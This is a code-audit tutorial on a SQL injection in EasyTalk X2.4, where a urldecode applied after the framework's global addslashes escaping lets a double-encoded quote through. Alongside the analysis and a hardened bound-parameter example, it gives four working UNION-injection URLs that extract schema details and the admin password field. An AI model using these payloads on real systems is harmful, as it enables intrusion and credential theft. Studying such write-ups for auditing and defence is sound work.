[PHP code audit case tutorial] SQL injection 2: bypassing global protection with urldecode

Source: Internet
Author: User
0x01 Background

Most web applications today ship some form of global protection against SQL injection: magic_quotes_gpc is enabled in PHP, or a global include runs addslashes() over every received parameter so that single quotes arrive escaped. To get past that layer we look for encoding or decoding functions that run on the parameter after the global filter has already done its work and undo the escaping. This article covers the urldecode case.

The vulnerability comes from Wooyun: http://www.wooyun.org/bugs/wooyun-2014-050338

0x02 environment setup

Following the Wooyun report, we use an older EasyTalk release, version X2.4.

I packed a copy of the source code: http://pan.baidu.com/s/1bopOFNL

Extract the package into the easytalk directory under www and follow the installer prompts step by step (search for any error you hit). Once the install succeeds, open the site in a browser:

0x03 vulnerability analysis

First, a look at the source tree. The program is built on the ThinkPHP framework, which is fairly involved:

The framework internals are worth studying if you are interested; for now it is enough to know that ThinkPHP filters received parameters and escapes them depending on whether magic_quotes_gpc is enabled on the server:

1. Line 3 of /ThinkPHP/Extend/Library/ORG/Util/Input.class.php:

```php
/**
 +----------------------------------------------------------
 * If magic_quotes_gpc is disabled, escape the string with addslashes()
 +----------------------------------------------------------
 * @access public
 * @param  string $string  the string to be processed
 * @return string
 +----------------------------------------------------------
 */
static public function addSlashes($string) {
    // With magic_quotes_gpc on, PHP has already escaped $_GET/$_POST/$_COOKIE;
    // otherwise the framework escapes quotes, backslashes and NUL itself.
    if (!get_magic_quotes_gpc()) {
        $string = addslashes($string);
    }
    return $string;
}
```

2. Using the global search of the Seay code audit system for the keyword "urldecode", we find TopicAction.class.php, which urldecodes the received keyword parameter and then uses it in a SQL query:

3. Following into that file: the keyword is urldecoded on receipt and immediately concatenated into the query, which is where the injection comes from:

```php
public function topic() {
    // ThinkPHP's _get() applies the named filter, here urldecode, to the
    // parameter after the global addslashes/GPC escaping has already run
    // (see http://doc.thinkphp1.cn/manual/get_system_var.html)
    $keyword = $this->_get('keyword', 'urldecode');
    if ($keyword) {
        // the decoded keyword goes straight into the WHERE clause: the sink
        $topic = D('topic')->where("topicname='$keyword'")->find();
        if ($topic) {
            $isfollow = D('mytopic')->isfollow($topic['id'], $this->my['user_id']);
            $topicusers = D('mytopicview')->where("topicid='$topic[id]'")
                ->order('id desc')->limit(9)->select();
            // get widget
            $widget = M('topicwidget')->where("topicid='$topic[id]'")
                ->order('`order` asc')->select();
            if ($widget) {
                foreach ($widget as $val) {
                    $topicwidget[$val['widgettype']][] = $val;
                }
                $this->assign('topicwidget', $topicwidget);
            }
        } else {
            $count = $isfollow = 0;
        }
        $this->assign('comefrom', 'topic');
        $this->assign('keyword', $keyword);
        $this->assign('topic', $topic);
        $this->assign('topicusers', $topicusers);
        $this->assign('isfollow', $isfollow);
        $this->assign('subname', '#' . $keyword . '#');
        $this->display();
    } else {
        header("location:" . SITE_URL . '/?m=topic&a=index');
    }
}
```
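To make the ordering concrete, here is an added PHP example (not code from EasyTalk or the original post) that simulates the three stages a request passes through: the web server's single URL decode into $_GET, the global addslashes() filter, and the controller's second urldecode(). It prints the resulting SQL for a single-encoded and a double-encoded quote, and shows the bound-parameter form that does not depend on escaping order. The function names, the et_topic table and the request strings are stand-ins constructed for illustration.

```php
<?php
// Added example, not code from EasyTalk or the original post. Reproduces the
// filter order that lets %2527 reach the query as a bare quote:
//   1. the web server decodes the query string once (%25 -> %)
//   2. the global filter (magic_quotes_gpc / addslashes) escapes quotes
//   3. the controller runs urldecode() a second time
// Function and table names below are stand-ins chosen for illustration.

// Step 2: stand-in for ThinkPHP's Input::addSlashes() with magic_quotes_gpc off.
function global_filter(string $value): string
{
    return addslashes($value);
}

// Step 3: stand-in for $this->_get('keyword', 'urldecode').
function read_keyword(array $get): string
{
    return urldecode(global_filter($get['keyword'] ?? ''));
}

// The vulnerable pattern: interpolating the value inside quotes.
function vulnerable_query(string $keyword): string
{
    return "SELECT * FROM et_topic WHERE topicname='$keyword'";
}

// Hardened form: decode if the application really needs to, then bind the
// value instead of interpolating it. Returns statement text and parameters
// as a PDO prepare()/execute() pair would receive them.
function hardened_query(string $keyword): array
{
    return ['SELECT * FROM et_topic WHERE topicname = ?', [$keyword]];
}

// Constructed requests: a plain encoded quote and the double-encoded quote.
$requests = [
    'single encoding' => 'm=topic&a=topic&keyword=aaa%27%20and%201%3D2%23',
    'double encoding' => 'm=topic&a=topic&keyword=aaa%2527%20and%201%3D2%23',
];

foreach ($requests as $label => $query_string) {
    parse_str($query_string, $get);      // step 1: what $_GET holds
    $keyword = read_keyword($get);        // steps 2 and 3
    printf("%s\n  in \$_GET:              %s\n  after filter+urldecode: %s\n",
        $label, $get['keyword'], $keyword);
    printf("  vulnerable SQL:         %s\n", vulnerable_query($keyword));
    [$sql, $params] = hardened_query($keyword);
    printf("  bound SQL:              %s  params=%s\n", $sql, json_encode($params));
}
```

With single encoding $_GET holds `aaa' and 1=2#`, addslashes() turns it into `aaa\' and 1=2#`, urldecode() leaves the backslash alone, and the quote stays escaped in the statement. With double encoding $_GET holds `aaa%27 and 1=2#`, addslashes() sees nothing to escape, and urldecode() then produces `aaa' and 1=2#`, which lands in the WHERE clause unescaped. The bound form carries the same decoded value as a parameter, so the order of decoding and escaping no longer matters; on PHP versions where magic_quotes_gpc is on, step 2 happens inside PHP before $_GET is populated and the result is identical.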
0x04 proof of vulnerability

1. A PoC that returns the database name, current user and server version:

http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3,concat(database(),0x5c,user(),0x5c,version()),5%23

The information is returned in the page:

The MySQL log confirms the injected statement was executed:

2. A PoC that lists all tables in the eazytalk database (the table_schema value is the hex encoding of 'eazytalk', which avoids needing a second quote):

http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3,(select GROUP_CONCAT(DISTINCT table_name) from information_schema.tables where table_schema=0x65617a7974616c6b),5%23

The table names are returned:

3. A PoC that lists all columns of the et_users table (0x65745F7573657273 is the hex encoding of 'et_users'):

http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3,(select GROUP_CONCAT(DISTINCT column_name) from information_schema.columns where table_name=0x65745F7573657273),5%23

All columns of et_users are returned:

4. A PoC that reads the first account in et_users:

http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3,(select GROUP_CONCAT(DISTINCT user_name,0x5f,password) from et_users limit 0,1),5%23

The admin account's user_name and password field are returned:

Original article address: http://www.cnbraid.com/2015/12/24/sql1/
